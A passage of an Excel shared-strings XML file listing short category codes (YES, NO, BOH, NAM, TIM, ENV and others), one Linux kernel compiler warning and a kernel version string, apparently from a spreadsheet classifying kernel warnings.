    <t>TOT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NUM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lib/ts_kmp.c:125: warning: initialization from incompatible pointer type</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.6.17</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ENV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>YES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BOH</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UNK</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NO</t>
